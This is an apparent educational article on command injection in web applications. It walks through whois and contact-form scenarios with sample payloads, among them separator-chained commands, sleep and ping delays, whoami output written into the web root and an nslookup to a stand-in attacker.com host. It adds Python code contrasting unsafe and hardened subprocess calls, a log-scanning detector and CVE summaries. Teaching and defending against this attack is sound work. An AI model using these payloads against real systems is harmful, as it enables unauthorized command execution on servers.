Command injection (also referred to as shell injection) is a web security vulnerability allowing an attacker to execute arbitrary commands on the host operating system through a vulnerable web application. These attacks can occur when an application passes unsanitized user-provided data (such as form inputs, cookies, or HTTP headers) to a system shell, enabling potential exploitation.

Example Attack Scenarios

Scenario 1

Consider a web application that gives information about a user-provided domain, such as who owns the domain, how to get in touch with them, and the reseller. To provide this information, the application runs the whois command with the user-provided domain name and returns the output to the browser. When a user submits a domain name, the URL looks like the following:

https://vulnerable-webapp/whois?domianName=google.com

When a request is sent with the URL above, the following command is executed on the host server:

whois google.com

If the application has no defense against command injection, an attacker can send a request with the following URL to execute arbitrary commands on the host operating system:

https://vulnerable-webapp/whois?domianName=google.com%3Bid

This causes the server to execute the following OS command:

whois google.com;id

The ; symbol separates commands in a Linux shell, much as the & symbol does on Windows. So the output will contain the results of both commands: the whois lookup and id.
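The vulnerable pattern from this scenario beside a hardened version, as an added example that is not code from the original article. It assumes a Python back end; the tool name is a parameter so the demo can run offline with echo standing in for whois.

```python
import re
import subprocess

# Strict allowlist for a hostname: labels of letters, digits and hyphens joined by dots.
DOMAIN_RE = re.compile(
    r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}$", re.I
)


def whois_unsafe(domain: str, tool: str = "whois") -> str:
    """Vulnerable: the user-supplied domain is concatenated into a shell command
    line, so a ';' in the input ends the whois command and starts a second one."""
    command = f"{tool} {domain}"
    result = subprocess.run(command, shell=True, capture_output=True, text=True)
    return result.stdout


def argv_only(domain: str, tool: str = "whois") -> str:
    """Argv form without validation: no shell parses the value, so metacharacters
    reach the program as literal text and no second command runs. Validation is
    still wanted, e.g. to stop a value starting with '-' being read as an option."""
    return subprocess.run([tool, domain], capture_output=True, text=True).stdout


def whois_safe(domain: str, tool: str = "whois") -> str:
    """Hardened: reject anything that is not a plain hostname, then pass the value
    as a separate argv element."""
    if not DOMAIN_RE.match(domain):
        raise ValueError(f"invalid domain name: {domain!r}")
    result = subprocess.run([tool, domain], capture_output=True, text=True)
    return result.stdout


if __name__ == "__main__":
    # Constructed input mirroring the page's google.com;id payload (echo instead of id).
    payload = "google.com;echo INJECTED"
    print(whois_unsafe(payload, tool="echo"))   # second line shows the injected command ran
    print(argv_only(payload, tool="echo"))      # whole payload echoed as one literal argument
    try:
        whois_safe(payload, tool="echo")
    except ValueError as exc:
        print("rejected:", exc)
```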

Scenario 2 – Blind Command Injection

A blind command injection vulnerability arises when the application is vulnerable to command injection but does not include the command's output in its HTTP response, so the result of the injected command is never shown to the attacker.

Imagine that the web application has a contact form through which users can send messages. The server-side application then generates an email containing the message. To do this, it invokes the mail command, providing the submitted details as arguments. The web application does not return the output of the mail command in its HTTP responses; it may just return a message saying that the message was sent successfully.

In this scenario, several approaches are available to detect and exploit the vulnerability.

Using the Time Delays Approach to Detect the Command Injection Vulnerability

An attacker can inject a command that triggers a time delay. If the application takes correspondingly longer to respond, the attacker can infer that it is vulnerable to command injection.

For example, the following inputs can be used to detect a command injection vulnerability by means of a time delay:

For Linux:

; sleep 5

For Windows:

& timeout 5

If the application takes 5 seconds to return the response, it is vulnerable to command injection.

Another common choice is ping, since it lets an attacker set the number of ICMP packets to send and thereby control how long the command takes to execute.

For example, with the following input the application pings its own loopback interface, which keeps the command running for a duration of 10 seconds.

& ping -c 5 127.0.0.1

Using the Redirecting Output Approach to Exploit the Command Injection Vulnerability

An attacker can redirect the output of the injected command into a file within the web root and then retrieve that file with a browser.

Suppose the application serves static assets from the file path /var/www/static. In that case, if an attacker supplies the following input:

& whoami > /var/www/static/attack_result.txt

the attacker can read the command's output simply by browsing to the following URL:

https://vulnerable-webapp/attack_result.txt

Using the Out-of-Band (OAST) Approach to Exploit the Command Injection Vulnerability

An attacker can inject a command that triggers an out-of-band network interaction with a system under the attacker's control.

For example, the following command performs a DNS lookup for the given domain. An attacker who controls that domain's name servers can watch for the lookup to confirm that the injected command ran.

& nslookup attacker.com
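The three blind-injection techniques above leave a recognisable trace in the request itself, even when the response reveals nothing. The following detector, an added example and not part of the original article, scans constructed access-log lines for the page's own payloads (percent-encoded ; or &, and probe commands such as sleep, ping or nslookup) after URL-decoding each query parameter.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log lines (combined-log style) mirroring the page's payloads.
LOG_LINES = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /whois?domianName=google.com HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /whois?domianName=google.com%3Bid HTTP/1.1" 200 640',
    '10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /whois?domianName=google.com%3B+sleep+5 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:08 +0000] "GET /whois?domianName=google.com%26+nslookup+attacker.com HTTP/1.1" 200 512',
]

REQUEST_RE = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/')
# Shell command separators and substitution syntax: the primary signal.
METACHAR_RE = re.compile(r"[;&|`\n]|\$\(")
# Probe commands used in the page's blind-injection payloads; illustrative, not exhaustive.
PROBE_RE = re.compile(r"\b(?:sleep|timeout|ping|nslookup|whoami|id)\b")


def inspect_request(line: str) -> list:
    """Return (client_ip, param, decoded_value, reasons) for each query parameter
    in one log line that looks like a command injection attempt."""
    match = REQUEST_RE.match(line)
    if not match:
        return []
    client_ip, path = match.groups()
    findings = []
    # parse_qsl percent-decodes the value, so %3B becomes ';' and '+' becomes a space.
    for name, value in parse_qsl(urlsplit(path).query, keep_blank_values=True):
        reasons = []
        if METACHAR_RE.search(value):
            reasons.append("shell metacharacter")
        if PROBE_RE.search(value):
            reasons.append("probe command")
        if reasons:
            findings.append((client_ip, name, value, reasons))
    return findings


def scan_log(lines) -> list:
    """Run inspect_request over every line and collect all findings."""
    return [hit for line in lines for hit in inspect_request(line)]


if __name__ == "__main__":
    for ip, name, value, reasons in scan_log(LOG_LINES):
        print(f"{ip} {name}={value!r}: {', '.join(reasons)}")
```

The decoded value is what the shell would have seen, so matching on it rather than on the raw URL also catches payloads that only differ in encoding.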

Examples of Known Command Injection Vulnerabilities

CVE-2021-21315

The System Information Library for Node.JS (npm package “systeminformation”) is an open-source collection of functions to retrieve detailed hardware, system, and OS information. In systeminformation before version 5.3.1 there is a command injection vulnerability.


CVE-2023-33617

An OS command injection vulnerability in Parks Fiberlink 210 firmware version V2.1.14_X000 was found via the target_addr parameter of /boaform/admin/formPing.


CVE-2014-6271

GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment.


How To Prevent Command Injection Attacks

To see how code should be written to prevent command injection attacks, read the How to Prevent Command Injection Vulnerability article, which is part of the Secure Software Development Series.
